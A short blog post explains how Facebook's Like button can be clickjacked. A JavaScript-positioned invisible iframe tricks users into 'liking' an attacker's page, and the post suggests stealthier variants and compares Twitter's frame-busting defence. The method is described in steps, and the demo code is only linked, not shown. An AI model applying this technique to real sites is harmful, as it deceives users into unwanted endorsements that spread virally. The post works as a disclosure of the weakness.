Eric Kerr

The Facebook Open Graph Like Button is susceptible to a type of attack known as clickjacking. Basically, if the like button is embedded on the page you’re on, made completely transparent, then an attacker could trick you into Liking something without your discretion.

How the attack works:

1. User navigates to your page, like button is embedded invisibly
2. As user moves mouse, JavaScript is used to keep the button beneath the user’s cursor.
3. User clicks what they believe is a link on the page and “Likes” the attacker’s content instead.
4. User doesn’t see any notification of Liking the content, which results in a News Feed story.
5. News Feed contains mention of attacker’s content, which allows it to grow virally.

View Demo | View Source (button intentionally visible)

More advanced versions might use cookies to detect when a user is returning so they can actually use the site after presumably clicking the like button. Other modifications might include detection on when a user clicks the invisible iframe so it is removed without the user knowing and browsing returns to normal (this works in IE and Firefox, but not Chrome to my knowledge because of iFrame security). The above demo arbitrarily hides the button after 10 seconds and leaves the button visible for effect.

Twitter ran into a very similar attack last february with the propagation of a “Don’t Click” button. The main difference is that Twitter was able to block the hole by disabling iFrame embeds (basically if (window.top !== window.self), then Twitter is nefariously being iFrame embedded). Since the Like Button itself is an iFrame, Facebook can’t employ the same logic to detect clickjacking.

Advanced users would notice the change in cursor since the mouse is always located above a link and can’t be overridden since it’s in an iFrame. However, during the casual flow of browsing this would hardly go noticed.